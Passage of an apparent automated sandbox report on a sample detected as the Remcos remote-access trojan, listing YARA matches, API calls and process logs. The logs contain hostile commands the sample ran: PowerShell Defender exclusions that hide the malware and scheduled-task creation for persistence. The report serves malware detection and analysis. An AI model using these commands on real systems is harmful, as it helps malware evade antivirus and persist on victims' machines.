            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ZRuVeAoBoxootS.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, bOBVVhEMRC4cWwkxdR.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, bOBVVhEMRC4cWwkxdR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, bOBVVhEMRC4cWwkxdR.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, EfxCjuFBDrNuN7uJX7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, bOBVVhEMRC4cWwkxdR.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, bOBVVhEMRC4cWwkxdR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, bOBVVhEMRC4cWwkxdR.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, EfxCjuFBDrNuN7uJX7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@21/16@2/3
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | File created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Mutant created: NULL
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-6GPUH1
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4536:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4680:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | File created: C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | ReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
            Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Process created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Process created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp"
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Process created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Process created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: cryptbase.dllJump to behavior
